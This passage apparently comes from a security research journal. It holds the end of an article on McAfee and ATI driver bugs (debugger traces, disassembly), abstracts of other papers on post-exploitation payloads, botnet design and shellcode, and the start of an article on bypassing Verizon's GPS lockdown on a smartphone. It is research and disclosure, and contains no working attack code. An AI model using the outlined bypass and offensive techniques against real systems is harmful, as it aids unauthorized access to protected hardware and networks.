attempting to obtain a handle to the process object before it is inserted by
nt!ObInsertObject, McAfee effectively destroys state that is needed by
nt!ObInsertObject to succeed.
To show this problem being experienced in the real world, the following
debugger output shows McAfee first attempting to obtain a handle to the process
object which is then followed shortly thereafter by nt!ObInsertObject
attempting to validate the object's access mask with a bogus SecurityDescriptor
which, in turn, results in an unrecoverable access violation:
McAfee attempting to open a handle to the process object before
nt!ObInsertObject has been called:
kd> k
nt!ObpChargeQuotaForObject+0x2f
nt!ObpIncrementHandleCount+0x70
nt!ObpCreateHandle+0x17c
nt!ObOpenObjectByPointer+0x97
WARNING: Stack unwind information not available.
NaiFiltr+0x2e45
NaiFiltr+0x3bb2
NaiFiltr+0x4217
nt!ObpLookupObjectName+0x56a
nt!ObOpenObjectByName+0xe9
nt!IopCreateFile+0x407
nt!IoCreateFile+0x36
nt!NtOpenFile+0x25
nt!KiSystemService+0xc4
nt!ZwOpenFile+0x11
0x80a367b5
nt!PspCreateProcess+0x326
nt!NtCreateProcessEx+0x7e
nt!KiSystemService+0xc4
After which point nt!ObInsertObject attempts to validate the
object's access mask using an invalid SecurityDescriptor:
kd> k
nt!ObpValidateAccessMask+0xb
nt!ObInsertObject+0x1c2
nt!PspCreateProcess+0x5dc
nt!NtCreateProcessEx+0x7e
nt!KiSystemService+0xc4
kd> r
eax=fa7bbb54 ebx=ffa9fc60 ecx=00023994
edx=00000000 esi=00000000 edi=ffb83f00
eip=8057828e esp=fa7bbb40 ebp=fa7bbbb8
iopl=0 nv up ei pl nz na pe nc
cs=0008 ss=0010 ds=0023 es=0023
fs=0030 gs=0000 efl=00000202
nt!ObpValidateAccessMask+0xb:
8057828e f6410210
test byte ptr [ecx+0x2],0x10 ds:0023:00023996=??
The method by which this issue was located was by setting a breakpoint on the
instruction after the call to nt!ObCreateObject in nt!PspCreateProcess. Once
hit, a memory access breakpoint was set on the Flags attribute of the object's
header that would break whenever the field was written to. This, in turn, lead
to the tracking down of the fact that McAfee was acquiring a handle to the
process object prior to nt!ObInsertObject being called, which in turn lead to
the OB_FLAG_CREATE_INFO flag being cleared and the ObjectCreateInfo attribute
being invalidated.
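The procedure can be sketched as a kd session; the displacement of the instruction following the nt!ObCreateObject call and the object address are placeholders here, as both vary between builds and runs:

```
; break on the instruction after the call to nt!ObCreateObject
; inside nt!PspCreateProcess (displacement is build-specific)
kd> bp nt!PspCreateProcess+0xNN
kd> g
Breakpoint 0 hit
; <object> is the pointer returned through &ProcessObject; its
; OBJECT_HEADER begins 0x18 bytes earlier, with Flags at +0x0f
kd> ba w1 (<object>-0x18+0xf)
kd> g
```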
2.3) The Solution
There are two ways that have been identified that could correct this issue.
The first, and most plausible, would be for McAfee to modify their driver such
that it will refuse to acquire a handle to a process object if the
OB_FLAG_CREATE_INFO bit is set in the process' object header Flags attribute. The
downside to using this approach is that it requires McAfee to make use of
undocumented structures that are intended by Microsoft to be opaque, and for
good reason. However, the author is not currently aware of another means by
which an object's creation state can be detected using general purpose API
routines.
The second approach, which would require a change within nt!ObInsertObject
itself, would be to check to see if the object's
OB_FLAG_CREATE_INFO bit has been cleared. If it has, an alternate action can be
taken to validate the object's access mask. If it hasn't, the current method
of validating the access mask can be used. At this point in time, the author
cannot currently speak on what the alternate action would be, though it seems
plausible that there would be another means by which a synonymous action could
be performed without relying on the creation information in the object header.
In the event that neither of these solutions are pursued, it will continue to
be necessary for protagonistic developers to avoid performing actions between
nt!ObCreateObject and nt!ObInsertObject that might result in file operations
being performed from within the new process' context. One of a number of
work-arounds to this problem would be to post file operations off to a system
worker thread that would then inherently run within the context of the System
process rather than the new process.
3) ATI Radeon 9000 Driver Series
3.1) The Assumption
The ATI Radeon 9000 Driver Series, and likely other ATI driver series, makes
assumptions about the location that the RTL_USER_PROCESS_PARAMETERS structure will
be mapped at in the address space of a process that attempts to do 3D
operations. If the structure is not mapped at the address that is expected,
the machine may blue screen depending on the values that exist at the memory
location, if any.
3.2) The Problem
During some experimentation with changing the default address space layout of
processes on NT-based versions of Windows, it was noticed that machines that
were using the ATI Radeon 9000 series drivers would crash if a process
attempted to do 3D operations and the location of the process' parameter
information was changed from the address at which it is normally mapped.
Before proceeding, it is first necessary for the reader to understand the
purpose of the process parameter information structure and how it is that it's
mapped into the process' address space.
Most programmers are familiar with the API routine kernel32!CreateProcess[A/W].
This routine serves as the primary means by which user-mode applications spawn
new processes. The function itself is robust enough to support a number of
ways in which a new process can be initialized and then executed. Behind the
scenes, CreateProcess performs all of the necessary operations to prepare the
new task for execution. These operations include opening the executable image
file and creating a section object that is then passed to
ntdll!NtCreateProcessEx which returns a unique process handle on success. If a
handle is obtained, CreateProcess then proceeds to prepare the process for
execution by initializing the process' parameters as well as creating and
initializing the first thread in the process. A more complete analysis of the
way in which CreateProcess operates can be found in David Probert's excellent
analysis of Windows NT's process architecture.
For the purpose of this document, however, the part that is of most concern is
that step in which CreateProcess initializes the new process' parameters. This
is accomplished by making a call into kernel32!BasePushProcessParameters which
in turn calls into ntdll!RtlCreateProcessParameters. The parameters are
initialized within the process that is calling CreateProcess and are then, in
turn, copied into the address space of the new process by first allocating
storage with ntdll!NtAllocateVirtualMemory and then by copying the memory from
the parent process to the child with ntdll!NtWriteVirtualMemory. Due to the
fact that this occurs before the new process actually executes any code, the
address at which the process parameter structure is allocated is almost
guaranteed to be the same every time. This address happens to be 0x00020000.
This fact is most likely why ATI made the assumption that the process parameter
information would always be at a static address.
If, however, ntdll!NtAllocateVirtualMemory allocates the process parameter
storage at any place other than the static address described above, ATI's
driver will attempt to reference a potentially invalid address when it comes
time to perform 3D operations. The specific portion of the driver suite that
has the error is the ATI3DUAG.DLL kernel-mode graphics driver. Inside this
image there is a portion of code that attempts to make reference to the
addresses 0x00020038 and 0x0002003C without doing any sort of probing and
locking or validation on the region it's requesting. If the region does not
exist or contains unexpected data, a blue screen is a sure thing. The actual
portion of the driver that makes this assumption can be found below:
mov [ebp+var_4], eax
mov edx, 20000h <--
mov [ebp+var_24], edx
movzx ecx, word ptr ds:dword_20035+3 <--
shr ecx, 1
mov [ebp+var_28], ecx
lea eax, [ecx-1]
mov [ebp+var_1C], eax
test eax, eax
jbe short loc_227CC
mov ebx, [edx+3Ch] <--
cmp word ptr [ebx+eax*2], '\'
The lines of interest are marked by ``<--'' indicators pointing to the exact
instructions that result in a reference being made to an address that is
expected to be within a process' parameter information structure. For the sake
of investigation, one might wonder what it is that the driver could be
attempting to reference. To determine that, it is first necessary to dump the
format of the process parameter structure which, as stated previously, is
RTL_USER_PROCESS_PARAMETERS:
RTL_USER_PROCESS_PARAMETERS:
+0x000 MaximumLength : Uint4B
+0x004 Length : Uint4B
+0x008 Flags : Uint4B
+0x00c DebugFlags : Uint4B
+0x010 ConsoleHandle : Ptr32 Void
+0x014 ConsoleFlags : Uint4B
+0x018 StandardInput : Ptr32 Void
+0x01c StandardOutput : Ptr32 Void
+0x020 StandardError : Ptr32 Void
+0x024 CurrentDirectory : _CURDIR
+0x030 DllPath : _UNICODE_STRING
+0x038 ImagePathName : _UNICODE_STRING
+0x040 CommandLine : _UNICODE_STRING
+0x048 Environment : Ptr32 Void
+0x04c StartingX : Uint4B
+0x050 StartingY : Uint4B
+0x054 CountX : Uint4B
+0x058 CountY : Uint4B
+0x05c CountCharsX : Uint4B
+0x060 CountCharsY : Uint4B
+0x064 FillAttribute : Uint4B
+0x068 WindowFlags : Uint4B
+0x06c ShowWindowFlags : Uint4B
+0x070 WindowTitle : _UNICODE_STRING
+0x078 DesktopInfo : _UNICODE_STRING
+0x080 ShellInfo : _UNICODE_STRING
+0x088 RuntimeData : _UNICODE_STRING
+0x090 CurrentDirectores : [32] _RTL_DRIVE_LETTER_CURDIR
To determine the attribute that the driver is attempting to reference, one must
take the addresses and subtract them from the base address 0x00020000. This
produces two offsets: 0x38 and 0x3c. Both of these offsets are within the
ImagePathName attribute which is a UNICODE_STRING. The UNICODE_STRING structure
is defined as:
UNICODE_STRING:
+0x000 Length : Uint2B
+0x002 MaximumLength : Uint2B
+0x004 Buffer : Ptr32 Uint2B
This would mean that the driver is attempting to reference the path name of the
process' executable image. The 0x38 offset is the length of the image path
name and the 0x3c offset is the pointer to the image path name buffer that actually
contains the path. The reason that the driver would need to get access to the
executable path is outside of the scope of this discussion, but suffice to say
that the method on which it is based is an assumption that may not always be
safe to make, especially under conditions where the process' parameter
information is not mapped at 0x00020000.
3.3) The Solution
The solution to this problem would be for ATI to come up with an alternate
means by which the process' image path name can be obtained. Possibilities for
alternate methods include referencing the PEB to obtain the address of the
process parameters (by using the ProcessParameters attribute of the PEB). This
approach is suboptimal because it requires that ATI attempt to reference fields
in a structure that is intended to be opaque and also readily changes between
versions of Windows. Another alternate approach, which is perhaps the most
feasible, would be to make use of the ProcessImageFileName PROCESSINFOCLASS.
This information class can be queried using the NtQueryInformationProcess
system call to populate a UNICODE_STRING that contains the full path to the
image that is associated with the handle that is supplied to
NtQueryInformationProcess. The nice thing about this is that it actually
indirectly uses the alternate method from the first proposal, but it does so
internally rather than forcing an external vendor to access fields of the PEB.
Regardless of the actual solution, it seems obvious that assuming that a region
of memory will be mapped at a fixed address in every process is something that
ATI should not do. There are indeed cases where Windows itself requires
certain things to be mapped at the same address between one execution of a
process to the next, but it is the opinion of the author that ATI should not
assume things that Windows itself does not also assume.
4) Conclusion
Though this document may appear as an attempt to make specific 3rd party
vendors look bad, that is not its intention. In fact, the author acknowledges
having been an antagonistic developer in the past. To that point, the author
hopes that by providing specific illustrations of where assumptions made by 3rd
parties can lead to problems, the reader will be more apt to consider potential
conditions that might become problematic if other applications attempt to
co-exist with ones that the reader may write in the future.
Bibliography
Probert, David B. Windows Kernel Internals: Process Architecture.
http://www.i.u-tokyo.ac.jp/ss/lecture/new-documents/Lectures/13-Processes/Processes.ppt;
accessed April 04, 2005.
Engineering in Reverse
Introduction to Reverse Engineering Win32 Applications
trew
During the course of this paper the reader will be (re)introduced to many concepts and tools essential to understanding and controlling native Win32 applications through the eyes of Windows Debugger (WinDBG). Throughout, WinMine will be utilized as a vehicle to deliver and demonstrate the functionality provided by WinDBG and how this functionality can be harnessed to aid the reader in reverse engineering native Win32 applications. Topics covered include an introductory look at IA-32 assembly, register significance, memory protection, stack usage, various WinDBG commands, call stacks, endianness, and portions of the Windows API. Knowledge gleaned will be used to develop an application designed to reveal and/or remove bombs from the WinMine playing grid.
code.tgz | pdf | html | txt
Exploitation Technology
Post-Exploitation on Windows using ActiveX Controls
skape
When exploiting software vulnerabilities it is sometimes impossible to build direct communication channels between a target machine and an attacker's machine due to restrictive outbound filters that may be in place on the target machine's network. Bypassing these filters involves creating a post-exploitation payload that is capable of masquerading as normal user traffic from within the context of a trusted process. One method of accomplishing this is to create a payload that enables ActiveX controls by modifying Internet Explorer's zone restrictions. With ActiveX controls enabled, the payload can then launch a hidden instance of Internet Explorer that is pointed at a URL with an embedded ActiveX control. The end result is the ability for an attacker to run custom code in the form of a DLL on a target machine by using a trusted process that uses one or more trusted communication protocols, such as HTTP or DNS.
pdf | html | txt
General Research
Smart Parking Meters
h1kari
Security through obscurity is unfortunately much more common than people think: many interfaces are built on the premise that since they are a "closed system" they can ignore standard security practices. This paper will demonstrate how parking meter smart cards implement their protocol and will point out some weaknesses in their design that open the doors to the system. It will also present schematics and code that you can use to perform these basic techniques for auditing almost any type of blackbox secure memory card.
html | txt
General Security
Loop Detection
Peter Silberman
During the course of this paper the reader will gain new knowledge about previous and new research on the subject of loop detection. The topic of loop detection will be applied to the field of binary analysis and a case study will be given to illustrate its uses. All of the implementations provided in this document have been written in C/C++ using Interactive Disassembler (IDA) plug-ins.
code.tgz | pdf | html | txt
Social Zombies: Aspects of Trojan Networks
warlord
Malicious code is so common in today's Internet that it seems impossible for an average user to keep his or her system clean. It's estimated that several hundred thousand machines are infected by trojans to be abused in a variety of ways, including the theft of money and confidential data as well as extortion, spam, and a whole plethora of further ways. Most often the infected hosts are linked into simple botnets to provide an easy way for the botnet manager to command his zombie army. This article describes ways to form far more effective networks than the ones in use today by the means of stealth, deception, and cryptography.
pdf | html | txt
Machine Speak
Mac OS X PPC Shellcode Tricks
H D Moore
Developing shellcode for Mac OS X is not particularly difficult, but there are a number of tips and techniques that can make the process easier and more effective. The independent data and instruction caches of the PowerPC processor can cause a variety of problems with exploit and shellcode development. The common practice of patching opcodes at run-time is much more involved when the instruction cache is in incoherent mode. NULL-free shellcode can be improved by taking advantage of index registers and the reserved bits found in many opcodes, saving space otherwise taken by standard NULL evasion techniques. The Mac OS X operating system introduces a few challenges to unsuspecting developers; system calls change their return address based on whether they succeed and oddities in the Darwin kernel can prevent standard execve() shellcode from working properly with a threaded process. The virtual memory layout on Mac OS X can be abused to overcome instruction cache obstacles and develop even smaller shellcode.
pdf | html | txt
What Were They Thinking?
Annoyances Caused by Unsafe Assumptions
skape
This installation of What Were They Thinking illustrates some of the annoyances that can be caused when developing software that has to inter-operate with third-party applications. Two such cases will be dissected and discussed in detail for the purpose of showing how third-party applications can fail when used in conjunction with software that performs certain tasks. The analysis of the two cases is meant to show how complex failure conditions can be analyzed and used to determine inter-operability problems.
pdf | html | txt
Can you find me now? - Unlocking the Verizon Wireless xv6800 (HTC Titan) GPS
10/2008
Skywing
skywing_uninformed@valhallalegends.com
0. Abstract
In August 2008 Verizon Wireless released a firmware upgrade for their xv6800
(rebranded HTC Titan) line of Windows Mobile smartphones that provided a number
of new features previously unavailable on the device on the initial release
firmware. In particular, support for accessing the device's built-in Qualcomm
gpsOne assisted GPS chipset was introduced with this update. However, Verizon
Wireless elected to attempt to lock down the GPS hardware on xv6800 such that
only applications authorized by Verizon Wireless would be able to access the
device's built-in GPS hardware and perform location-based functions (such as
GPS-assisted navigation). The mechanism used to lock down the GPS hardware is
entirely client-side based, however, and as such suffers from fundamental
limitations in terms of how effective the lockdown can be in the face of an
almost fully user-programmable Windows Mobile-based device. This article
outlines the basic philosophy used to prevent unauthorized applications from
accessing the GPS hardware and provides a discussion of several of the flaws
inherent in the chosen design of the protection mechanism. In addition,
several pitfalls relating to debugging and reverse engineering programs on
Windows Mobile are also discussed. Finally, an overview of several suggested
design alterations that would have mitigated some of the flaws in the current
GPS lock down system from the perspective of safeguarding the privacy of user
location data are also presented.
1. Introduction
The Verizon Wireless xv6800 (which is in and of itself a rebranded version of
the HTC Titan, with a carrier-customized firmware loadout) is a recently
released Windows Mobile-based smartphone. A firmware update released during
August 2008 enabled several new features on the device. For the purposes of
this article, the author has elected to focus on the embedded Qualcomm gpsOne
chipset, which provides assisted GPS facilities to applications running on the
device.
With the official firmware upgrade (known as MR1), the assisted GPS support on
the device, which had previously remained inaccessible when using carrier-
supported firmware, was activated, albeit with a catch; only applications that
were approved by Verizon Wireless were able to access the built-in GPS hardware
present on the device. Although third-party applications could access an
externally connected (for example, Bluetooth-enabled) GPS device, the Qualcomm
gpsOne chipset embedded in the phone itself remained inaccessible. Coinciding
with the public release of the xv6800 MR1 firmware, Verizon Wireless also began
making available a subscription-based application (called "VZ Navigator"),
which provides voice-based turn-by-turn navigation on the xv6800 via the usage
of the device's built-in GPS hardware.
There have been a variety of third-party firmware images released for the
xv6800 that mix-and-match portions of official firmware releases from other
carriers supporting their own rebranded versions of xv6800 (HTC Titan). Some
of these custom firmware images enable access to the gpsOne hardware, albeit
with several caveats. In particular, until recently, assisted GPS mode, wherein
the cellular network aids the device in acquiring a GPS fix, was not available
on Verizon Wireless's network with custom firmware images; only standalone GPS
mode (which requires waiting for a "cold lock" on three GPS satellites, a
process that may take many minutes after device boot) was enabled. In
addition, installing these custom firmware images requires patching out a
signature check in the software loader on the device. This procedure may be
considered dangerous if one wishes to retain hardware warranty support (which
may be desirable, given the steep unsubsidized cost of the device).
Furthermore, should one install the official Verizon Wireless MR1 firmware
upgrade, the gpsOne hardware on the device would remain locked down even if one
switched to a currently available third-party firmware image. This
is likely due to a sticky setting written to the firmware during the carrier
provisioning process at the completion of the MR1 firmware upgrade. As the
presently available third-party ROM images do not wipe the area of the device's
firmware which seems to control the GPS hardware's lockdown state, it becomes
difficult to unlock the GPS hardware after having upgraded to the MR1 firmware
image. A lengthy process is available to undo this change, but it involves
the complete reset of most provisioning settings on the device, such that the
phone must be partially manually reprovisioned, as opposed to utilizing the
over-the-air provisioning support.
Given the downsides of relying on custom firmware images for enabling the
built-in GPS hardware on the xv6800, the official firmware release does pose a
reasonable attraction. However, the locking down of the GPS hardware to only
Verizon Wireless authorized applications is undesirable should one wish to use
third-party location-enabled applications with the built-in GPS hardware, such
as Google Maps or Microsoft's Live Search.
Verizon Wireless indicates that third-party application usage of the GPS
hardware on their devices is subject to Verizon Wireless-dictated policies and
procedures [1]. In particular, the security of user location information is
often cited [2] as a reason for requiring location-enabled applications to be
certified by Verizon Wireless. Unfortunately, the mechanism deployed to lock
built-in GPS hardware on the xv6800 provides very little in the way of true
security against third-party programs (malicious or otherwise) from accessing
location information. In fact, given Windows Mobile 6's lack of "hard" process
isolation, it is questionable as to whether it is even technically feasible to
provide a truly secure protection mechanism on a device that allows
user-supplied programs to be loaded and executed.
While there may be golden intentions in attempting to protect users from
malicious programs designed to harvest their location information on-the-fly,
the protection system as implemented to control access to the gpsOne chipset
on the xv6800 is unfortunately relatively weak. This is at odds with Verizon
Wireless's stated goals of attempting to protect the security of a user's location
information, and thus may place users at risk.
2. Overview of Protection Mechanisms
There are multiple levels of protection mechanisms built-in to both the MR1
firmware image for the xv6800, as well as the GPS-enabled subscription VZ
Navigator software that Verizon Wireless supports as the sole officially
sanctioned location-based application (at the time of this article's writing).
The protection mechanisms can be broken up into those that exist on the device
firmware itself, and those that exist in the VZ Navigator software.
2.1. Firmware-based Protection Mechanisms
The MR1 firmware provides the underlying foundation of the built-in GPS
hardware lockdown logic. There are several built-in software components that
are "baked into" the firmware image and support the GPS lockdown system. The
principal design underpinning the firmware-based protection system, however, is
a fairly run-of-the-mill security-through-obscurity approach. In
particular, GPS location information obtained by the built-in gpsOne hardware
(specifically, latitude and longitude) is encrypted. Only programs that
understand how to decrypt the position information are able to make sense of
any data returned by the gpsOne chipset.
Furthermore, in order to initiate a location fix via the built-in gpsOne
hardware, an application must continually answer correctly to a series of
challenge-response interactions with the gpsOne chipset driver (and thus the
radio firmware on the device). The reason for implementing both a
challenge-response mechanism as well as obfuscating the actual GPS location
will become apparent after further discussion.
The firmware-based protected gpsOne interface has several constituent layers,
with supporting code present at radio-firmware level, kernel driver level, and
user mode application level.
At the lowest level, the radio firmware for the device chipset would appear to
have a hand in obfuscating returned GPS positioning data. This assumption is
logically based on a strings dump of radio firmware images indicating the
presence of AES-related calls in GPS-related code (AES is used to encrypt the
returned location information), and the fact that switching to a custom
firmware image after installing the MR1 update does not re-enable the plaintext
gpsOne interface.
Between the radio firmware (which executes outside the context of Windows
Mobile) and the OS itself, there exists a kernel mode Windows Mobile driver
known as the GPS intermediate driver. This module (gpsid_qct.dll) provides an
interface between user mode callers and the GPS hardware on the device. It
also provides support for multiplexing a single piece of GPS hardware across
multiple user mode applications concurrently (a standard feature of Windows
Mobile's GPS support). However, Verizon Wireless has broken this support with
the locked down GPS logic that has been placed in the xv6800's implementation
of the GPS intermediate driver.
Beneath the GPS intermediate driver, there are two different interfaces that
are supported for the collection of location data on Windows Mobile-based
devices [4]. The first of these is an emulated serial port that is exposed to
user mode, and implements a standard NMEA-compatible text-based interface for
accessing location information. This interface has also been broken by the
GPS intermediate driver used by Verizon Wireless on the xv6800, for reasons
that will become clear upon further discussion.
The second interface for retrieving location information via the GPS
intermediate driver is a set of IOCTLs implemented by the GPS intermediate
driver to retrieve parsed (binary) GPS data from the currently-active GPS
hardware (returned as C-style structures). User mode callers do not typically
call these IOCTLs directly from their code, but instead indirect through a set
of thin C API wrappers in a system-supplied module called gpsapi.dll. This
interface is also broken by the GPS lockdown logic in the GPS intermediate
driver, although an extended version of this IOCTL-based interface is used by
GPS-enabled applications that support the locked down mode of operation on the
xv6800.
Verizon Wireless ships a custom module parallel to gpsapi.dll on the xv6800,
named oemgpsOne.dll. This module exports a superset of the APIs provided by
the standard gpsapi.dll (although there are slight differences in function
names). Additionally, new APIs (which are, as in gpsapi.dll, simply thin
wrappers around IOCTL requests sent to the GPS intermediate driver) are
provided to manage the challenge-response and encrypted GPS location aspects
of the gpsOne lockdown system present on the xv6800. Through correct usage of
the APIs exported by oemgpsOne.dll, a program with knowledge of the GPS lock
down system can retrieve valid positioning data from the gpsOne chipset on the
device.
Applications that are approved by Verizon Wireless for location-enabled
operation make calls to a library developed by Verizon Wireless and Autodesk,
named LBSDriver.dll, which is itself a client of oemgpsOne.dll. LBSDriver.dll
and its security measures are discussed later, along with VZ Navigator.
2.1.a. Application Authorization via Challenge-response
In order to activate the gpsOne hardware on the xv6800 and request a GPS
location fix, an application must receive a challenge data block from the
gpsOne driver and perform a secret transform on the given data in order to
create a well-formed response. Until this process is completed, the gpsOne
hardware will not attempt to return a location fix. Furthermore, a
location-enabled application using the built-in gpsOne hardware must
continually complete additional challenge-response sequences (using the same
underlying algorithms) as it continues to acquire updated location fixes from
the gpsOne hardware.
The first step in connecting to the GPS intermediate driver to retrieve valid
position information is to open a handle to a GPS intermediate driver instance.
This is accomplished with a call to an oemgpsOne.dll export by the name of
oGPSOpenDevice. The parameters and return value of this function are analogous
to the standard Windows Mobile GPSOpenDevice routine [5].
HANDLE
oGPSOpenDevice(
__in HANDLE NewLocationData,
__in HANDLE DeviceStateChange,
__in const WCHAR *DeviceName,
__in DWORD Flags
);
After a handle to the GPS intermediate driver instance is available, the next
step in preparing for the challenge-response sequence is to issue a call to
a second function implemented by oemgpsOne.dll, named oGPSGetBaseSSD.
This routine returns a session-specific blob of data that is later used in the
challenge-response process. In the current implementation, the returned blob
appears to always contain the same data across every invocation.
DWORD
oGPSGetBaseSSD(
__in HANDLE Device,
__out unsigned char *Buf, // sizeof = 0x10
__out unsigned long *BufLength, // 0x10
__out unsigned short *Buf2 // sizeof = 0x10
);
Next, the GPS intermediate driver must be provided with a valid event handle to
signal when a new challenge cycle has been requested by the driver. This is
accomplished via a call to the oGPSEnableSecurity function in oemgpsOne.dll.
DWORD
oGPSEnableSecurity(
__in HANDLE Device,
__in HANDLE SecurityChangeEvent
);
After the session-specific blob has been retrieved, and an event handle for
new challenge requests has been provided to the GPS intermediate driver, the
next step is to receive a challenge block from the GPS intermediate driver and
compute a valid response. The application must wait until the GPS intermediate
driver signals the challenge request event before requesting the current
challenge data block. Once the driver signals the event that was passed to
oGPSEnableSecurity, the application must execute one challenge-response cycle.
Challenge data blocks are retrieved from the gpsOne driver via a call to a
routine exported from oemgpsOne.dll, named oGPSReadSecurityConfig. As per the
prototype, this routine takes a handle to the GPS intermediate driver instance,
and returns a blob of data used to generate a challenge response.
DWORD
oGPSReadSecurityConfig(
__in HANDLE Device,
__out unsigned char *Buf // On return, 0x4 + 1 + 1 + Buf[0x6] (max length 0x1c total)
);
After the challenge data blob has been retrieved via a call to
oGPSReadSecurityConfig, the GPS lockdown-aware application must perform a
series of secret transformations on it before indicating a companion response
blob down to the GPS intermediate driver. The transformation function consists
of some bit-shuffling of the challenge blob, followed by a SHA-1 hash of the
shuffled challenge blob concatenated with the session-specific data blob. This
process yields the bulk of the response data less a two-byte header that is
prepended prior to indication down to the GPS intermediate driver.
The process of sending the computed challenge-response is accomplished via a
call to another function in oemgpsOne.dll, by the name of
oGPSWriteSecurityConfig.
DWORD
oGPSWriteSecurityConfig(
__in HANDLE Device,
__in unsigned char *Buf // 0x1C
);
The GPS intermediate driver will continue to periodically challenge the
application while it requests updated position fixes from the gpsOne chipset.
This is accomplished by signaling the event passed to oGPSEnableSecurity, which
indicates to the application that it should retrieve a new challenge and create
a new response, using the mechanism outlined above.
2.1.b. Location Information Encryption
Without passing the challenge-response scheme previously described, the GPS
intermediate driver will refuse to return a set of position information from
the gpsOne hardware. Even after the challenge-response system has been
implemented, however, a secondary layer of security must be addressed. This
security layer takes the form of the encryption of the latitude and longitude
values returned by the gpsOne chipset.
While this second layer of security may appear superfluous at first glance,
there exists a valid reason for it. Recall that the GPS intermediate driver
multiplexes a single piece of GPS hardware across multiple applications. In
the implementation of the current GPS intermediate driver for the xv6800, the
challenge-response scheme appears to map directly to the gpsOne chipset itself.
Thus, once a single program has passed the challenge-response mechanism, and as
long as that program continues to respond correctly to challenge-response
requests, any program on the system can call any of the standard Windows Mobile
GPS interfaces to retrieve location data. This presents the obvious security
hole wherein a Verizon Wireless-approved GPS application is started, and then a
third-party application using the standard Windows Mobile GPS API is loaded,
in effect "piggy-backing" on top of the challenge-response code residing in the
approved application to allow access to the embedded gpsOne hardware.
For reasons unclear to the author, the designers of the GPS lockdown system
did not choose to simply disable GPS requests not associated with the program
that has passed the challenge-response scheme. Instead, a different approach
is taken, such that the GPS intermediate driver encrypts the location
information that it returns via either serial port or gpsapi.dll interfaces.
In order to make sense of the returned latitude and longitude values, a program
must be able to decrypt them. While the GPS intermediate driver provides the
plaintext equivalent of the decryption key to any program that knows how to
request it, this information is not available to clients of the standard Windows Mobile
NMEA-compatible virtual serial port or gpsapi.dll interfaces. Aside from
latitude and longitude data, however, all other information returned by the
standard Windows Mobile GPS interface is unadulterated and valid (this includes
altitude and timing information, primarily).
Thus, the first step to decoding valid position values is to call an extended
version of the standard Windows Mobile GPSGetPosition routine [6]. This
extended routine is named oGPSGetPosition, and it, too, is implemented in
oemgpsOne.dll. The prototype matches that of the standard GPSGetPosition,
although an extended version of the GPS_POSITION structure containing
additional information (including a blob needed to derive the decryption key
required to decrypt the longitude and latitude values) is returned.
DWORD
oGPSGetPosition(
__in HANDLE Device,
__out PGPS_POSITION GPSPosition,
__in DWORD MaximumAge,
__in DWORD Flags
);
Decryption of the latitude and longitude information is fairly straightforward,
involving a transform (via the same transformation process described
previously) of the challenge data returned as a part of the extended
GPS_POSITION structure. This yields an AES key, which is imported into a
CryptoAPI key object, and then used in ECB mode to decrypt the latitude and
longitude values.
Once decryption is complete, a scaling factor is then applied to the resultant
coordinate values, in order to bring them in line with the unit system used by
the standard Windows Mobile GPS interfaces.
2.2. VZ Navigator (Application-level) Protection Mechanisms
While many parts of the GPS lockdown system are implemented by radio firmware-
level or kernel mode-level code, portions are also implemented in user mode.
An approved Verizon Wireless application accesses location information by
calling through a module developed by Verizon Wireless and Autodesk, and named
LBSDriver.dll. In an approved application, it is the responsibility of
LBSDriver.dll to communicate with the GPS intermediate driver via
oemgpsOne.dll, and implement the challenge-response and position decryption
functionality. LBSDriver.dll then exports a subset of the standard Windows
Mobile gpsapi.dll (with several custom additions), for usage by approved
programs on the xv6800.
Additionally, LBSDriver.dll implements a user-controlled privacy policy on top
of the gpsOne hardware. The user is allowed to specify at what times of day a
particular program can access location information, and whether the user is
prompted to confirm the request. The privacy policy configuration process is
driven via a dialog box (implemented and created by LBSDriver.dll) that is
shown on the device the first time an application runs, and subsequently via
a Verizon Wireless-operated web site [7]. Privacy policy settings are
obfuscated and stored in the registry, keyed off of a hash of the calling
program's main process image fully-qualified filename.
Because LBSDriver.dll is a standard, loadable DLL, it is vulnerable to being
loaded by untrusted code. There are several defenses implemented by the
LBSDriver module which attempt to deter third-party programs that have not been
approved by Verizon Wireless from successfully loading LBSDriver.dll and
subsequently using it to access location information.
The first such protection embedded into LBSDriver.dll is a digital signature
check on the main process executable corresponding to any program that attempts
to load LBSDriver.dll. This check is ultimately triggered when the
GPSOpenDevice export on LBSDriver.dll is called. Specifically, the calling
process module is confirmed to be signed by a custom certificate. If this is
not the case, then an error dialog is shown, and the GPSOpenDevice request is
denied. This check is based on calling GetModuleFileName(NULL, ...) [8] to
retrieve the path to the main process image, which is then run through the
aforementioned signature check.
Additionally, LBSDriver.dll also connects to an Autodesk-operated server in
order to determine if the calling program is authorized to use LBSDriver.dll.
In addition to verifying that the calling program is approved as a GPS-enabled
application, the Autodesk-operated server also appears to indicate back to the
client whether or not the user's account has been provisioned for a
subscription location-enabled application, such as VZ Navigator. A program
hoping to utilize LBSDriver.dll must pass these checks in order to successfully
acquire a location fix using the built-in gpsOne hardware.
The Autodesk-operated server also provides configuration information (such as
Position Determining Entity (PDE) addresses) that is later used in the assisted
GPS process. However, this configuration information appears to be more or
less static, at least for the critical portions necessary to enable assisted
GPS, and can thus be cached and reused by third-party programs without even
needing to go through the Autodesk server.
3. Opening gpsOne on the xv6800 to Third-party Applications.
Understanding the protection mechanisms that implement the locking down of the
built-in GPS hardware is only part of the battle to enable third-party
GPS-enabled programs to operate on the xv6800. Undocumented functions in
oemgpsOne.dll with no equivalent in the standard Windows Mobile gpsapi.dll, and
various quirks of Windows Mobile itself preclude a straightforward
implementation to unlock the GPS for third-party programs.
Furthermore, third-party GPS-enabled programs are written to one (or commonly,
both) of the standard Windows Mobile GPS interfaces. Because these interfaces
are disabled on the xv6800, a solution to adapt third-party programs to the
locked down GPS interface would be required (in lieu of modifying every single
third-party application to support the locked down GPS interface). As many of
these third-party applications are closed-source and frequently updated, any
solution that required direct modification of a third-party program would be
untenable from a maintenance perspective.
The solution chosen was to write an emulation layer for the standard Windows
Mobile gpsapi.dll interface, which translates standard gpsapi.dll function
calls into requests compatible with the locked down GPS interface.
3.1. Examining gpsOne Driver Interactions
The first step in implementing a layer to unlock the gpsOne hardware on the
xv6800 involves discovering the correct sequence of oemgpsOne.dll calls (and
thus calls to the GPS intermediate driver, as oemgpsOne.dll is merely a thin
wrapper around IOCTL requests to the GPS intermediate driver, for the most
part, with some minor exceptions).
The standard way that this would be done on a Windows-based system would be to
run VZ Navigator under a debugger, but there exist several complications that
prevent this from being an acceptable solution for monitoring oemgpsOne.dll
requests.
First, the assisted GPS functionality of the gpsOne hardware requires that the
device be connected to the cellular network, and operating with it as the
